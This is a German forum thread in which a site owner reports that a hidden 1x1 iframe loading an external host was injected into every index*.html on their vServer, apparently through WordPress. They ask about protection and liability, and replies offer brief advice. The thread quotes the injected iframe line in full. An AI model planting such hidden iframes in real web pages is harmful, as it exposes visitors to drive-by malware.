Domainhack?

[lightzoom]

hi,

vor ein paar tagen wurde scheinbar meine domain gehackt. in jede "index*.html" wurde ein iframe geschrieben:

PHP-Code:

<iframe src='http://quickcnt.com/ld/axhst/' width='1' height='1' style='visibility: hidden;'></iframe> 


absolute frechheit sowas! diese einträge führten dazu, daß google mir eine email schickte und mich kurzfristig in der googlesuche als "Diese Webseite könnte ihren Computer beschädigen" eingestuft.

nach einer mörder-langen-manuell-cleaning-aktion jeder einzelnen datei ist nun alles wieder clean und google hat mich auch wieder von der roten liste genommen. sicherheitshalber habe ich die index.html's auf chmod 444 gesetzt und die passwörter geändert.

nun meine frage: wie kann ich mich vor solchen angriffen schützen und vor allem, wie kann diese penner haftbar machen?

vielen dank und grüße, s.

[sebastian]

Bist du bei einem Hoster oder hast du einen eigenen Server?

Hast du nur HTML Dateien online oder irgendwelche serverseitigen Scripts,
die Sicherheitslücken enthalten können?

Haftbar machen: Wer weiß wie er auf dein Server kommt, der weiß auch
wie er seine Herkunft verschleiern kann.

greetz

[lightzoom]

ich habe einen vserver.
wahrscheilich hat der angreifer den installierten wordpress blog als hintertür benutzt. ansonsten sind keine weiteren serverscripts aktiv.

[rechtschreibfan]

wird wohl wordpress gewesen sein.

für dich (und die archivleser) auch nochmal: ist ein rootserver das richtige für mich? rootserver (und vserver) sind keine spielzeuge. wenn man sich nicht auskennt, finger weg davon.

grüße
axo